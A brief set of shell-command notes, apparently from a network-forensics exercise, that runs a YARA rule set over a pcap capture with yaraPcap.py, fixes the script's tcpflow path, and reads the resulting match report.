python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/

whereis tcpflow

vim yaraPcap.py **** fix line 35 with correct path to tcpflow ****

python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/

cd matching_files/

ls

cat report.txt
------------------------------------------------------------------------
